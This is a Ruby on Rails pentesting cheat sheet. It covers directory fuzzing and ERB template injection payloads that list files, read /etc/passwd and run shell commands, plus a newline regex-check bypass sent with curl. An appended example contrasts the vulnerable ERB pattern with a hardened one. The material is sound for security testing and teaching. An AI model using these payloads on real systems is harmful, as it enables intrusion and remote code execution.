Ruby on Rails Pentesting
Last modified: 2023-08-10
Ruby on Rails is a web application framework written in Ruby.
Common Directories
/assets/application.css
/config
/Gemfile
/Gemfile.lock
/rails/info
/rails/info/properties
/rails/info/routes
In addition, it is worth fuzzing under the /rails/ directory, as below.
ffuf -u https://example.com/rails/FUZZ -w wordlist.txt
ERB Template Injection
If the target website renders user-controlled input through an ERB template, we can inject a malicious template.
require 'erb'
# The string becomes the template source, so the ERB tag inside it is evaluated.
text = "<%= 2*3 %>"
result = ERB.new(text).result(binding)
puts result
# expected result: 6
Payloads
Reference: Server Side Template Injection
<%= 2*3 %>
<%= self.methods %>
<%= self.method(:handle_POST).parameters %>
<!-- List files and directories -->
<%= Dir.entries('/') %>
<%= File.open('/etc/passwd').read %>
<!-- Code Execution -->
<%= system('cat /etc/passwd') %>
<%= `ls -la /` %>
<%= IO.popen('ls /').readlines() %>
Regex Check Bypass
Reference: https://davidhamann.de/2022/05/14/bypassing-regular-expression-checks/
abc\n<%- 2*3 %>
We can also use the curl command if we want to send a payload that contains a newline.
Below is an example using the URL-encoded payload <%= IO.popen('ls /').readlines() %>.
curl https://example.com/ -X POST -d 'abc
%3C%25%3D%20IO%2Epopen%28%27ls%20%2F%27%29%2Ereadlines%28%29%20%25%3E'
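The following Ruby example is added here and is not part of the original page: it places the vulnerable ERB pattern from the template injection section (user input used as template source) beside a hardened form that passes input as data, and shows why the regex check bypass above succeeds against ^ and $ but not against \A and \z. The sample inputs are constructed, and SAFE_TEMPLATE is an assumed application template.

```ruby
require 'erb'

# Constructed sample inputs for the demonstration (not from the original page).
TEMPLATE_LIKE_INPUT = "<%= 2*3 %>".freeze
MULTILINE_INPUT     = "abc\n<%- 2*3 %>".freeze

# Vulnerable pattern from the page: user input becomes the template *source*,
# so any ERB tag inside it is evaluated with the caller's binding.
def render_unsafe(user_input)
  ERB.new(user_input).result(binding)
end

# Hardened pattern: the template source is a fixed, developer-written string
# (assumed here); user input is supplied as data through result_with_hash and
# HTML-escaped, so it is neither evaluated as Ruby nor injected as markup.
SAFE_TEMPLATE = "Hello, <%= ERB::Util.html_escape(name) %>!".freeze

def render_safe(user_input)
  ERB.new(SAFE_TEMPLATE).result_with_hash(name: user_input)
end

# Input validation: in Ruby, ^ and $ match at line boundaries, so a value
# with an embedded newline passes a "letters only" check on its first line.
def letters_only_per_line?(s)
  !!(s =~ /^[a-z]+$/)
end

# \A and \z anchor to the start and end of the whole string, so the newline
# and everything after it are part of what must match.
def letters_only_whole_string?(s)
  !!(s =~ /\A[a-z]+\z/)
end

if __FILE__ == $PROGRAM_NAME
  puts render_unsafe(TEMPLATE_LIKE_INPUT)        # 6  (input was evaluated)
  puts render_safe(TEMPLATE_LIKE_INPUT)          # Hello, &lt;%= 2*3 %&gt;!
  p letters_only_per_line?(MULTILINE_INPUT)      # true  (check bypassed)
  p letters_only_whole_string?(MULTILINE_INPUT)  # false (input rejected)
end
```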